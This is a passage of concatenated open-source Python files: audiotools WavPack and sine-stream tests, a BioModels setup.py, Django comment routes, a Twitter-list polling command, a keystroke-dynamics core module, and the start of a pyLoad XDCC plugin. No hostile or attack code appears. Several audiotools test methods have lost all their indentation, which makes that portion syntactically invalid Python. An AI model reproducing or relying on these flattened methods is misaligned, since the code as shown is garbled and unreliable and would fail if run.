            test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 441.0, 0.49, 0.5),
            test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.61, 661.5, 0.37, 2.0),
            test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 882.0, 0.49, 0.7),
            test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.3),
            test_streams.Sine8_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 0.1),
            test_streams.Sine16_Mono(200000, 48000, 441.0, 0.50, 441.0, 0.49),
            test_streams.Sine16_Mono(200000, 96000, 441.0, 0.61, 661.5, 0.37),
            test_streams.Sine16_Mono(200000, 44100, 441.0, 0.50, 882.0, 0.49),
            test_streams.Sine16_Mono(200000, 44100, 441.0, 0.50, 4410.0, 0.49),
            test_streams.Sine16_Mono(200000, 44100, 8820.0, 0.70, 4410.0, 0.29),
            test_streams.Sine16_Stereo(200000, 48000, 441.0, 0.50, 441.0, 0.49, 1.0),
            test_streams.Sine16_Stereo(200000, 48000, 441.0, 0.61, 661.5, 0.37, 1.0),
            test_streams.Sine16_Stereo(200000, 96000, 441.0, 0.50, 882.0, 0.49, 1.0),
            test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.0),
            test_streams.Sine16_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 1.0),
            test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 441.0, 0.49, 0.5),
            test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.61, 661.5, 0.37, 2.0),
            test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 882.0, 0.49, 0.7),
            test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.3),
            test_streams.Sine16_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 0.1),
            test_streams.Sine24_Mono(200000, 48000, 441.0, 0.50, 441.0, 0.49),
            test_streams.Sine24_Mono(200000, 96000, 441.0, 0.61, 661.5, 0.37),
            test_streams.Sine24_Mono(200000, 44100, 441.0, 0.50, 882.0, 0.49),
            test_streams.Sine24_Mono(200000, 44100, 441.0, 0.50, 4410.0, 0.49),
            test_streams.Sine24_Mono(200000, 44100, 8820.0, 0.70, 4410.0, 0.29),
            test_streams.Sine24_Stereo(200000, 48000, 441.0, 0.50, 441.0, 0.49, 1.0),
            test_streams.Sine24_Stereo(200000, 48000, 441.0, 0.61, 661.5, 0.37, 1.0),
            test_streams.Sine24_Stereo(200000, 96000, 441.0, 0.50, 882.0, 0.49, 1.0),
            test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.0),
            test_streams.Sine24_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 1.0),
            test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 441.0, 0.49, 0.5),
            test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.61, 661.5, 0.37, 2.0),
            test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 882.0, 0.49, 0.7),
            test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.3),
            test_streams.Sine24_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 0.1),
            test_streams.Simple_Sine(200000, 44100, 0x7, 8,
                                     (25, 10000),
                                     (50, 20000),
                                     (120, 30000)),
            test_streams.Simple_Sine(200000, 44100, 0x33, 8,
                                     (25, 10000),
                                     (50, 20000),
                                     (75, 30000),
                                     (65, 40000)),
            test_streams.Simple_Sine(200000, 44100, 0x37, 8,
                                     (25, 10000),
                                     (35, 15000),
                                     (45, 20000),
                                     (50, 25000),
                                     (55, 30000)),
            test_streams.Simple_Sine(200000, 44100, 0x3F, 8,
                                     (25, 10000),
                                     (45, 15000),
                                     (65, 20000),
                                     (85, 25000),
                                     (105, 30000),
                                     (120, 35000)),
            test_streams.Simple_Sine(200000, 44100, 0x7, 16,
                                     (6400, 10000),
                                     (12800, 20000),
                                     (30720, 30000)),
            test_streams.Simple_Sine(200000, 44100, 0x33, 16,
                                     (6400, 10000),
                                     (12800, 20000),
                                     (19200, 30000),
                                     (16640, 40000)),
            test_streams.Simple_Sine(200000, 44100, 0x37, 16,
                                     (6400, 10000),
                                     (8960, 15000),
                                     (11520, 20000),
                                     (12800, 25000),
                                     (14080, 30000)),
            test_streams.Simple_Sine(200000, 44100, 0x3F, 16,
                                     (6400, 10000),
                                     (11520, 15000),
                                     (16640, 20000),
                                     (21760, 25000),
                                     (26880, 30000),
                                     (30720, 35000)),
            test_streams.Simple_Sine(200000, 44100, 0x7, 24,
                                     (1638400, 10000),
                                     (3276800, 20000),
                                     (7864320, 30000)),
            test_streams.Simple_Sine(200000, 44100, 0x33, 24,
                                     (1638400, 10000),
                                     (3276800, 20000),
                                     (4915200, 30000),
                                     (4259840, 40000)),
            test_streams.Simple_Sine(200000, 44100, 0x37, 24,
                                     (1638400, 10000),
                                     (2293760, 15000),
                                     (2949120, 20000),
                                     (3276800, 25000),
                                     (3604480, 30000)),
            test_streams.Simple_Sine(200000, 44100, 0x3F, 24,
                                     (1638400, 10000),
                                     (2949120, 15000),
                                     (4259840, 20000),
                                     (5570560, 25000),
                                     (6881280, 30000),
                                     (7864320, 35000))]:
            yield stream
    def __test_reader__(self, pcmreader, **encode_options):
        """Encode pcmreader to a temporary WavPack file with the given
        encoder options, verify the file with the reference wvunpack(1)
        binary, then decode it and check stream parameters plus an MD5
        of the decoded PCM against the source reader's digest."""
        if (not audiotools.BIN.can_execute(audiotools.BIN["wvunpack"])):
            self.assert_(False,
                         "reference WavPack binary wvunpack(1) required for this test")
        temp_file = tempfile.NamedTemporaryFile(suffix=".wv")
        self.encode(temp_file.name,
                    audiotools.BufferedPCMReader(pcmreader),
                    **encode_options)
        # "-vmq": verify with MD5, quiet output — see wvunpack(1)
        sub = subprocess.Popen([audiotools.BIN["wvunpack"],
                                "-vmq", temp_file.name],
                               stdout=open(os.devnull, "wb"),
                               stderr=open(os.devnull, "wb"))
        self.assertEqual(sub.wait(), 0,
                         "wvunpack decode error on %s with options %s" % \
                             (repr(pcmreader),
                              repr(encode_options)))
        # decode with our own decoder and check stream metadata
        wavpack = self.decoder(temp_file.name)
        self.assertEqual(wavpack.sample_rate, pcmreader.sample_rate)
        self.assertEqual(wavpack.bits_per_sample, pcmreader.bits_per_sample)
        self.assertEqual(wavpack.channels, pcmreader.channels)
        self.assertEqual(wavpack.channel_mask, pcmreader.channel_mask)
        # hash every decoded frame and compare against the source's digest
        md5sum = md5()
        f = wavpack.read(audiotools.FRAMELIST_SIZE)
        while (len(f) > 0):
            md5sum.update(f.to_bytes(False, True))
            f = wavpack.read(audiotools.FRAMELIST_SIZE)
        wavpack.close()
        self.assertEqual(md5sum.digest(), pcmreader.digest())
        temp_file.close()
@FORMAT_WAVPACK
def test_small_files(self):
for opts in self.encode_opts:
for g in [test_streams.Generate01,
test_streams.Generate02,
test_streams.Generate03,
test_streams.Generate04]:
gen = g(44100)
self.__test_reader__(gen, **opts)
@FORMAT_WAVPACK
def test_full_scale_deflection(self):
for opts in self.encode_opts:
for (bps, fsd) in [(8, test_streams.fsd8),
(16, test_streams.fsd16),
(24, test_streams.fsd24)]:
for pattern in [test_streams.PATTERN01,
test_streams.PATTERN02,
test_streams.PATTERN03,
test_streams.PATTERN04,
test_streams.PATTERN05,
test_streams.PATTERN06,
test_streams.PATTERN07]:
self.__test_reader__(
test_streams.MD5Reader(fsd(pattern, 100)), **opts)
@FORMAT_WAVPACK
def test_wasted_bps(self):
for opts in self.encode_opts:
self.__test_reader__(test_streams.WastedBPS16(1000), **opts)
@FORMAT_WAVPACK
def test_blocksizes(self):
noise = struct.unpack(">32h", os.urandom(64))
opts = {"false_stereo": False,
"wasted_bits": False,
"joint_stereo": False}
for block_size in [16, 17, 18, 19, 20, 21, 22, 23,
24, 25, 26, 27, 28, 29, 30, 31, 32, 33]:
for decorrelation_passes in [0, 1, 5]:
opts_copy = opts.copy()
opts_copy["block_size"] = block_size
opts_copy["correlation_passes"] = decorrelation_passes
self.__test_reader__(test_streams.MD5Reader(
test_streams.FrameListReader(noise,
44100, 1, 16)),
**opts_copy)
@FORMAT_WAVPACK
def test_silence(self):
for opts in self.encode_opts:
for (channels, mask) in [
(1, audiotools.ChannelMask.from_channels(1)),
(2, audiotools.ChannelMask.from_channels(2)),
(4, audiotools.ChannelMask.from_fields(
front_left=True,
front_right=True,
back_left=True,
back_right=True)),
(8, audiotools.ChannelMask(0))]:
for bps in [8, 16, 24]:
opts_copy = opts.copy()
for block_size in [44100, 32, 32768, 65535,
16777215]:
opts_copy['block_size'] = block_size
self.__test_reader__(
MD5_Reader(
EXACT_SILENCE_PCM_Reader(
pcm_frames=65536,
sample_rate=44100,
channels=channels,
channel_mask=mask,
bits_per_sample=bps)),
**opts_copy)
@FORMAT_WAVPACK
def test_noise(self):
for opts in self.encode_opts:
for (channels, mask) in [
(1, audiotools.ChannelMask.from_channels(1)),
(2, audiotools.ChannelMask.from_channels(2)),
(4, audiotools.ChannelMask.from_fields(
front_left=True,
front_right=True,
back_left=True,
back_right=True)),
(8, audiotools.ChannelMask(0))]:
for bps in [8, 16, 24]:
opts_copy = opts.copy()
for block_size in [44100, 32, 32768, 65535,
16777215]:
opts_copy['block_size'] = block_size
self.__test_reader__(
MD5_Reader(EXACT_RANDOM_PCM_Reader(
pcm_frames=65536,
sample_rate=44100,
channels=channels,
channel_mask=mask,
bits_per_sample=bps)),
**opts_copy)
@FORMAT_WAVPACK
def test_fractional(self):
def __perform_test__(block_size, pcm_frames):
self.__test_reader__(
MD5_Reader(EXACT_RANDOM_PCM_Reader(
pcm_frames=pcm_frames,
sample_rate=44100,
channels=2,
bits_per_sample=16)),
block_size=block_size,
correlation_passes=5,
false_stereo=False,
wasted_bits=False,
joint_stereo=False)
for pcm_frames in [31, 32, 33, 34, 35, 2046, 2047, 2048, 2049, 2050]:
__perform_test__(33, pcm_frames)
for pcm_frames in [254, 255, 256, 257, 258, 510, 511, 512, 513,
514, 1022, 1023, 1024, 1025, 1026, 2046, 2047,
2048, 2049, 2050, 4094, 4095, 4096, 4097, 4098]:
__perform_test__(256, pcm_frames)
for pcm_frames in [1022, 1023, 1024, 1025, 1026, 2046, 2047,
2048, 2049, 2050, 4094, 4095, 4096, 4097, 4098]:
__perform_test__(2048, pcm_frames)
for pcm_frames in [1022, 1023, 1024, 1025, 1026, 2046, 2047,
2048, 2049, 2050, 4094, 4095, 4096, 4097,
4098, 4606, 4607, 4608, 4609, 4610, 8190,
8191, 8192, 8193, 8194, 16382, 16383, 16384,
16385, 16386]:
__perform_test__(4608, pcm_frames)
for pcm_frames in [44098, 44099, 44100, 44101, 44102, 44103,
88198, 88199, 88200, 88201, 88202, 88203]:
__perform_test__(44100, pcm_frames)
    @FORMAT_WAVPACK
    def test_multichannel(self):
        """Encode multichannel mixes of identical and differing channels
        under every false-stereo/joint-stereo combination."""
        def __permutations__(executables, options, total):
            # yields every length-`total` list of readers, where each reader
            # is built by pairing an executable with its matching option dict
            if (total == 0):
                yield []
            else:
                for (executable, option) in zip(executables,
                                                options):
                    for permutation in __permutations__(executables,
                                                        options,
                                                        total - 1):
                        yield [executable(**option)] + permutation
        #test a mix of identical and non-identical channels
        #using different decorrelation, joint stereo and false stereo options
        # NOTE(review): `combos` is initialized but never incremented or read
        combos = 0
        for (false_stereo, joint_stereo) in [(False, False),
                                             (False, True),
                                             (True, False),
                                             (True, True)]:
            for (channels, mask) in [(2, 0x3), (3, 0x7), (4, 0x33),
                                     (5, 0x3B), (6, 0x3F)]:
                for readers in __permutations__([
                        EXACT_BLANK_PCM_Reader,
                        EXACT_RANDOM_PCM_Reader,
                        test_streams.Sine16_Mono],
                        [
                        {"pcm_frames": 100,
                         "sample_rate": 44100,
                         "channels": 1,
                         "bits_per_sample": 16},
                        {"pcm_frames": 100,
                         "sample_rate": 44100,
                         "channels": 1,
                         "bits_per_sample": 16},
                        {"pcm_frames": 100,
                         "sample_rate": 44100,
                         "f1": 441.0,
                         "a1": 0.61,
                         "f2": 661.5,
                         "a2": 0.37}],
                        channels):
                    # join the mono readers into one multichannel stream
                    joined = MD5_Reader(Join_Reader(readers, mask))
                    self.__test_reader__(joined,
                                         block_size=44100,
                                         false_stereo=false_stereo,
                                         joint_stereo=joint_stereo,
                                         correlation_passes=1,
                                         wasted_bits=False)
@FORMAT_WAVPACK
def test_sines(self):
for opts in self.encode_opts:
for g in self.__stream_variations__():
self.__test_reader__(g, **opts)
@FORMAT_WAVPACK
def test_option_variations(self):
for block_size in [11025, 22050, 44100, 88200, 176400]:
for false_stereo in [False, True]:
for wasted_bits in [False, True]:
for joint_stereo in [False, True]:
for decorrelation_passes in [0, 1, 2, 5, 10, 16]:
self.__test_reader__(
test_streams.Sine16_Stereo(200000,
48000,
441.0,
0.50,
441.0,
0.49,
1.0),
block_size=block_size,
false_stereo=false_stereo,
wasted_bits=wasted_bits,
joint_stereo=joint_stereo,
correlation_passes=decorrelation_passes)
    @FORMAT_WAVPACK
    def test_python_codec(self):
        """Encode with the pure-Python WavPack encoder and verify the
        Python-based and C-based decoders yield identical PCM data."""
        def test_python_reader(pcmreader, **encode_options):
            from audiotools.py_encoders import encode_wavpack

            #encode file using Python-based encoder
            temp_file = tempfile.NamedTemporaryFile(suffix=".wv")
            encode_wavpack(temp_file.name,
                           audiotools.BufferedPCMReader(pcmreader),
                           **encode_options)

            #verify contents of file decoded by
            #Python-based decoder against contents decoded by
            #C-based decoder
            from audiotools.py_decoders import WavPackDecoder as WavPackDecoder1
            from audiotools.decoders import WavPackDecoder as WavPackDecoder2
            # pcm_frame_cmp returns None when both streams match exactly
            self.assertEqual(audiotools.pcm_frame_cmp(
                WavPackDecoder1(temp_file.name),
                WavPackDecoder2(temp_file.name)), None)

            temp_file.close()

        #test small files
        for opts in self.encode_opts:
            for g in [test_streams.Generate01,
                      test_streams.Generate02,
                      test_streams.Generate03,
                      test_streams.Generate04]:
                gen = g(44100)
                test_python_reader(gen, **opts)

        #test full scale deflection
        for opts in self.encode_opts:
            for (bps, fsd) in [(8, test_streams.fsd8),
                               (16, test_streams.fsd16),
                               (24, test_streams.fsd24)]:
                for pattern in [test_streams.PATTERN01,
                                test_streams.PATTERN02,
                                test_streams.PATTERN03,
                                test_streams.PATTERN04,
                                test_streams.PATTERN05,
                                test_streams.PATTERN06,
                                test_streams.PATTERN07]:
                    test_python_reader(fsd(pattern, 100), **opts)

        #test wasted BPS
        for opts in self.encode_opts:
            test_python_reader(test_streams.WastedBPS16(1000), **opts)

        #test block sizes
        noise = struct.unpack(">32h", os.urandom(64))
        opts = {"false_stereo": False,
                "wasted_bits": False,
                "joint_stereo": False}
        for block_size in [16, 17, 18, 19, 20, 21, 22, 23,
                           24, 25, 26, 27, 28, 29, 30, 31, 32, 33]:
            for decorrelation_passes in [0, 1, 5]:
                opts_copy = opts.copy()
                opts_copy["block_size"] = block_size
                opts_copy["correlation_passes"] = decorrelation_passes
                test_python_reader(
                    test_streams.FrameListReader(noise,
                                                 44100, 1, 16),
                    **opts_copy)

        #test silence
        for opts in self.encode_opts:
            for (channels, mask) in [
                (1, audiotools.ChannelMask.from_channels(1)),
                (2, audiotools.ChannelMask.from_channels(2))]:
                opts_copy = opts.copy()
                opts_copy['block_size'] = 4095
                test_python_reader(
                    EXACT_SILENCE_PCM_Reader(
                        pcm_frames=4096,
                        sample_rate=44100,
                        channels=channels,
                        channel_mask=mask,
                        bits_per_sample=16),
                    **opts_copy)

        #test noise
        for opts in self.encode_opts:
            for (channels, mask) in [
                (1, audiotools.ChannelMask.from_channels(1)),
                (2, audiotools.ChannelMask.from_channels(2))]:
                opts_copy = opts.copy()
                opts_copy['block_size'] = 4095
                test_python_reader(
                    EXACT_RANDOM_PCM_Reader(
                        pcm_frames=4096,
                        sample_rate=44100,
                        channels=channels,
                        channel_mask=mask,
                        bits_per_sample=16),
                    **opts_copy)

        #test fractional
        for (block_size,
             pcm_frames_list) in [(33, [31, 32, 33, 34, 35, 2046,
                                        2047, 2048, 2049, 2050]),
                                  (256, [254, 255, 256, 257, 258, 510,
                                         511, 512, 513, 514, 1022, 1023,
                                         1024, 1025, 1026, 2046, 2047, 2048,
                                         2049, 2050, 4094, 4095, 4096, 4097,
                                         4098])]:
            for pcm_frames in pcm_frames_list:
                test_python_reader(EXACT_RANDOM_PCM_Reader(
                    pcm_frames=pcm_frames,
                    sample_rate=44100,
                    channels=2,
                    bits_per_sample=16),
                    block_size=block_size,
                    correlation_passes=5,
                    false_stereo=False,
                    wasted_bits=False,
                    joint_stereo=False)

        #test sines
        for opts in self.encode_opts:
            for g in [test_streams.Sine8_Mono(5000, 48000,
                                              441.0, 0.50, 441.0, 0.49),
                      test_streams.Sine8_Stereo(5000, 48000,
                                                441.0, 0.50, 441.0, 0.49, 1.0),
                      test_streams.Sine16_Mono(5000, 48000,
                                               441.0, 0.50, 441.0, 0.49),
                      test_streams.Sine16_Stereo(5000, 48000,
                                                 441.0, 0.50, 441.0, 0.49, 1.0),
                      test_streams.Sine24_Mono(5000, 48000,
                                               441.0, 0.50, 441.0, 0.49),
                      test_streams.Sine24_Stereo(5000, 48000,
                                                 441.0, 0.50, 441.0, 0.49, 1.0),
                      test_streams.Simple_Sine(5000, 44100, 0x7, 8,
                                               (25, 10000),
                                               (50, 20000),
                                               (120, 30000)),
                      test_streams.Simple_Sine(5000, 44100, 0x33, 8,
                                               (25, 10000),
                                               (50, 20000),
                                               (75, 30000),
                                               (65, 40000)),
                      test_streams.Simple_Sine(5000, 44100, 0x37, 8,
                                               (25, 10000),
                                               (35, 15000),
                                               (45, 20000),
                                               (50, 25000),
                                               (55, 30000)),
                      test_streams.Simple_Sine(5000, 44100, 0x3F, 8,
                                               (25, 10000),
                                               (45, 15000),
                                               (65, 20000),
                                               (85, 25000),
                                               (105, 30000),
                                               (120, 35000)),
                      test_streams.Simple_Sine(5000, 44100, 0x7, 16,
                                               (6400, 10000),
                                               (12800, 20000),
                                               (30720, 30000)),
                      test_streams.Simple_Sine(5000, 44100, 0x33, 16,
                                               (6400, 10000),
                                               (12800, 20000),
                                               (19200, 30000),
                                               (16640, 40000)),
                      test_streams.Simple_Sine(5000, 44100, 0x37, 16,
                                               (6400, 10000),
                                               (8960, 15000),
                                               (11520, 20000),
                                               (12800, 25000),
                                               (14080, 30000)),
                      test_streams.Simple_Sine(5000, 44100, 0x3F, 16,
                                               (6400, 10000),
                                               (11520, 15000),
                                               (16640, 20000),
                                               (21760, 25000),
                                               (26880, 30000),
                                               (30720, 35000)),
                      test_streams.Simple_Sine(5000, 44100, 0x7, 24,
                                               (1638400, 10000),
                                               (3276800, 20000),
                                               (7864320, 30000)),
                      test_streams.Simple_Sine(5000, 44100, 0x33, 24,
                                               (1638400, 10000),
                                               (3276800, 20000),
                                               (4915200, 30000),
                                               (4259840, 40000)),
                      test_streams.Simple_Sine(5000, 44100, 0x37, 24,
                                               (1638400, 10000),
                                               (2293760, 15000),
                                               (2949120, 20000),
                                               (3276800, 25000),
                                               (3604480, 30000)),
                      test_streams.Simple_Sine(5000, 44100, 0x3F, 24,
                                               (1638400, 10000),
                                               (2949120, 15000),
                                               (4259840, 20000),
                                               (5570560, 25000),
                                               (6881280, 30000),
                                               (7864320, 35000))]:
                test_python_reader(g, **opts)
class SineStreamTest(unittest.TestCase):
    @FORMAT_SINES
    def test_init(self):
        """Invalid constructor arguments must raise ValueError cleanly."""
        from audiotools.decoders import Sine_Mono
        from audiotools.decoders import Sine_Stereo
        from audiotools.decoders import Sine_Simple
        #ensure that failed inits don't make Python explode
        bad_prefixes = ((-1, 4000, 44100),   # negative bits-per-sample
                        (16, -1, 44100),     # negative total frames
                        (16, 4000, -1))      # negative sample rate
        for (constructor, tail) in ((Sine_Mono, (1.0, 1.0, 1.0, 1.0)),
                                    (Sine_Stereo, (1.0, 1.0, 1.0, 1.0, 1.0)),
                                    (Sine_Simple, (100, 100))):
            for prefix in bad_prefixes:
                self.assertRaises(ValueError, constructor, *(prefix + tail))
| Excito/audiotools | test/test_formats.py | Python | gpl-2.0 | 272,152 |
from setuptools import setup, find_packages

# Packaging metadata for BioModels entry BIOMD0000000210.
setup(name='BIOMD0000000210',
      version=20140916,
      description='BIOMD0000000210 from BioModels',
      url='http://www.ebi.ac.uk/biomodels-main/BIOMD0000000210',
      maintainer='Stanley Gu',
      # bug fix: was `maintainer_url`, which setuptools does not recognize;
      # the value is an e-mail address, so use the supported field
      maintainer_email='stanleygu@gmail.com',
      packages=find_packages(),
      package_data={'': ['*.xml', 'README.md']},
      )
from django.conf.urls import url
# NOTE(review): `admin` appears unused in this module
from django.contrib import admin
from .views import (
    CommentListAPIView,
    CommentDetailAPIView,
    CommentCreateAPIView,
    )

# URL routes for the comments API: list, create, and per-comment detail.
urlpatterns = [
    url(r'^$', CommentListAPIView.as_view(), name='list'),
    url(r'^create/$', CommentCreateAPIView.as_view(), name='create'),
    url(r'^(?P<pk>\d+)/$', CommentDetailAPIView.as_view(), name='thread'),
    #url(r'^(?P<id>\d+)/delete/$', comment_delete, name='delete'),
    ]
from django.core.management.base import BaseCommand, CommandError
from moderation.lists.poll import poll_lists_members


class Command(BaseCommand):
    """Management command that refreshes Twitter list memberships."""
    # NOTE(review): CommandError is imported but never raised here
    help = ("Poll lists of Twitter account, download their members, "
            "update UserModerationRelationship table")

    def handle(self, *args, **options):
        """Run the polling job, then report success on stdout."""
        poll_lists_members()
        self.stdout.write(self.style.SUCCESS('Done polling lists members'))
import pickle
import numpy as np
import scipy.stats
from abc import ABCMeta, abstractmethod
class KeypressEventReceiver(object):
    '''A class that receives keypress events through a callback.

    Subclasses implement on_key() to handle each event.'''
    __metaclass__=ABCMeta
    KEY_DOWN, KEY_UP= 0, 1  # event_type constants passed to on_key()

    @abstractmethod
    def on_key(self, key, event_type, time_ms):
        '''Handle one keypress event.

        key is an integer key code,
        event_type is in (KEY_DOWN, KEY_UP),
        time_ms is the time when the key was (de)pressed.
        '''
        pass
class VersionedSerializableClass( object ):
    """Base class for objects serialized to disk with an embedded version stamp.

    Subclasses override FILE_EXTENSION and CLASS_VERSION; on load, the
    stored version must match the current CLASS_VERSION exactly.
    """
    __metaclass__=ABCMeta
    FILE_EXTENSION=".pickle"
    CLASS_VERSION= -1

    def __init__(self, *args, **kwargs):
        # remember the version this object was created under
        self._class_version= self.CLASS_VERSION

    def save_to_file(self, filename):
        """Serialize this instance to filename + FILE_EXTENSION."""
        with open(filename+self.FILE_EXTENSION, 'wb') as f:
            self._serialize_to_file( f )

    @classmethod
    def load_from_file( cls, filename):
        """Deserialize an instance from disk, verifying type and version.

        FILE_EXTENSION is appended when `filename` does not exist as given.
        Raises TypeError when the file holds an unexpected type or a
        mismatched class version.
        """
        import os
        if not os.path.exists(filename):
            filename+=cls.FILE_EXTENSION
        with open(filename, 'rb') as f:
            instance= cls._deserialize_from_file( f )
        load_error=None
        if not isinstance( instance, cls ):
            load_error= 'Unexpected instance type'
        elif instance._class_version!=cls.CLASS_VERSION:
            load_error= 'Class version mismatch (expected "{}", got "{}")'.format( cls.CLASS_VERSION, instance._class_version)
        if load_error:
            raise TypeError("Failed to load serialized data from {}: {}".format(filename, load_error))
        return instance

    @classmethod
    def load_from_dir( cls, directory ):
        """Load every *FILE_EXTENSION file in `directory`.

        Returns a dict mapping each bare file name (extension removed) to
        its deserialized instance.
        """
        import os
        d= directory
        filenames= [f for f in os.listdir(d) if f.endswith(cls.FILE_EXTENSION)]
        path_names= [os.path.join(d,f) for f in filenames]
        # bug fix: str.rstrip(FILE_EXTENSION) strips a *character set*, not
        # a suffix, mangling names such as "topic" -> "to"; slice the
        # extension off instead (endswith() above guarantees it is present)
        bare_names= [fn[:-len(cls.FILE_EXTENSION)] for fn in filenames]
        instances= map( cls.load_from_file, path_names)
        return dict(zip(bare_names, instances))

    def _serialize_to_file( self, f ):
        pickle.dump(self, f)

    @classmethod
    def _deserialize_from_file( cls, f ):
        return pickle.load(f)
class KeystrokeCaptureData(KeypressEventReceiver, VersionedSerializableClass):
    '''A recorded sequence of raw keypress events captured from a user.'''
    FILE_EXTENSION=".keypresses"
    CLASS_VERSION= 0

    def __init__(self, existing_data=None):
        VersionedSerializableClass.__init__(self)
        if existing_data:
            self.log = list(existing_data)
        else:
            self.log = []

    def on_key(self, key, event_type, time_ms):
        '''Record one keypress event in this capture data.'''
        event = (key, event_type, time_ms)
        self.log.append(event)

    def feed(self, event_receiver):
        '''Replay every recorded event into a KeypressEventReceiver.
        Returns the event_receiver.'''
        for (key, event_type, time_ms) in self.log:
            event_receiver.on_key(key, event_type, time_ms)
        return event_receiver

    def _serialize_to_file(self, f):
        # events are plain tuples, so a literal repr round-trips safely
        f.write(str(self.log))

    @classmethod
    def _deserialize_from_file(self, f):
        from ast import literal_eval
        return KeystrokeCaptureData(literal_eval(f.read()))
class InsufficientData(ValueError):
    '''Raised when there is insufficient data to perform a given operation.

    An example would be too few samples for normal distribution estimation.'''
    pass
class GaussianDistribution(object):
    """A 1-D Gaussian (normal) distribution, optionally tagged with the
    number of samples its parameters were estimated from."""

    def __init__(self, mean=0.0, stddev=1.0, nsamples=None):
        self.mean, self.stddev = mean, stddev
        # nsamples is None for distributions not derived from data
        self.nsamples = nsamples

    @staticmethod
    def estimate_parameters(samples):
        """Return (mean, stddev, nsamples) estimated from `samples`.

        Uses the unbiased sample standard deviation (ddof=1), resolving
        the former TODO; stddev is clamped to at least 1% of the mean so
        it can never be zero.  Raises InsufficientData for fewer than
        two samples.
        """
        nsamples = len(samples)
        if nsamples < 2:
            raise InsufficientData()
        mean = np.mean(samples)
        stddev = np.std(samples, ddof=1)  # unbiased sample estimate
        stddev = max(mean * 0.01, stddev)  # avoid stddev==0
        return mean, stddev, nsamples

    def similarity(self, other_normal):
        """Rough overlap score in [0, 1] between two distributions.

        Quick-and-dirty heuristic: two-sided tail probability of the mean
        difference under the averaged stddev -- don't take it too seriously.
        """
        stddev = (self.stddev + other_normal.stddev) / 2.0
        difference = abs(self.mean - other_normal.mean)
        return 2 * scipy.stats.norm.cdf(-difference / stddev)

    def similarity_number(self, number):
        """Score in [0, 1] of how plausibly `number` belongs to this
        distribution (two-sided tail probability of its deviation)."""
        stddev = self.stddev
        difference = abs(self.mean - number)
        return 2 * scipy.stats.norm.cdf(-difference / stddev)

    def __repr__(self):
        return "{}({:.2f}, {:.2f}, {})".format(self.__class__.__name__, self.mean, self.stddev, self.nsamples)
class Named(object):
    '''Mixin for objects identified by a human-readable name.'''
    __metaclass__=ABCMeta

    def __init__(self, name):
        self.name = str(name)

    def __repr__(self):
        cls_name = self.__class__.__name__
        return "{}( {} )".format(cls_name, self.name)
class DictTree(dict, Named):
    '''A dict that can have other DictTree objects as values.

    Effectively an arbitrary tree: DictTree values are internal nodes and
    any other value is a leaf.'''
    IGNORE_CHILD='IGNORE_CHILD'

    def __init__( self, name, children=() ):
        '''If this DictTree is a child of another (its parent), NAME will be the key used to identify it in the parent dict.'''
        Named.__init__(self, name)
        for i,c in enumerate(children):
            c_name= c.name if isinstance(c, DictTree) else self._leaf_name(c, i)
            self[c_name]=c

    def _leaf_name(self, leaf, default=""):
        # subclasses can override when leaves carry no usable .name
        try:
            return leaf.name
        except AttributeError:
            return default

    @classmethod
    def intersect( cls, *trees ):
        '''Given N DictTrees, returns N DictTrees, such that
        each outputed tree is a exact copy of the input, but only
        contains children whose names (keys) appear on *all* trees
        (applied recursively to subtree children).'''
        from functools import reduce  # works on Python 2.6+ and 3.x
        common_names= reduce(set.intersection, [set(f.keys()) for f in trees])
        def get_childs( child_name ):
            '''returns the child with child_name for every tree'''
            childs= [tree[child_name] for tree in trees]
            if childs and isinstance(childs[0], DictTree):
                # bug fix: this recursion previously called the nonexistent
                # cls.getCommonFeatures(); recurse through intersect itself
                return cls.intersect(*childs)
            else:
                return childs
        all_childs= zip(*map( get_childs, common_names ))
        return [cls(tree.name, childs) for tree,childs in zip(trees, all_childs)]

    @staticmethod
    def _isleave( x ):
        return not isinstance(x, DictTree)

    @classmethod
    def map( cls, f_leave, *trees ):
        '''Apply f_leave to corresponding leaves of the given parallel
        trees, returning a new tree; children whose mapped value is
        IGNORE_CHILD are dropped.'''
        def map_child( *c ):
            return f_leave(*c) if DictTree._isleave(c[0]) else cls.map( f_leave, *c)
        old_children= zip(*(t.values() for t in trees))
        children= [map_child(*cs) for cs in old_children ]
        filtered_children= filter( lambda x: x is not cls.IGNORE_CHILD, children )
        return cls( trees[0].name, filtered_children )

    def reduce( self, reduce_f ):
        '''Fold reduce_f over every leaf of this tree, depth-first.'''
        from functools import reduce  # works on Python 2.6+ and 3.x
        return reduce(reduce_f, (c if DictTree._isleave(c) else c.reduce(reduce_f) for c in self.values()))

    def __repr__(self):
        return "{}({})".format(self.__class__.__name__, self.name)
| 4905ab/Keystroke_Dynamics_Accidentally_Kangaroo | Windows/#outed/core.py | Python | gpl-3.0 | 7,100 |
# -*- coding: utf-8 -*-
import re
import socket
import struct
import sys
from os import makedirs
from os.path import exists, join
from select import select
from time import time
from module.plugins.Hoster import Hoster
from module.utils import save_join
class Xdcc(Hoster):
    """Download from an IRC XDCC bot.

    Connects to the IRC server named in the xdcc:// URL, asks the bot for
    the given pack, waits for the DCC SEND offer and downloads the file.
    """
    __name__ = "Xdcc"
    __type__ = "hoster"
    __version__ = "0.32"

    __config__ = [("nick", "str", "Nickname", "pyload"),
                  ("ident", "str", "Ident", "pyloadident"),
                  ("realname", "str", "Realname", "pyloadreal")]

    __description__ = """Download from IRC XDCC bot"""
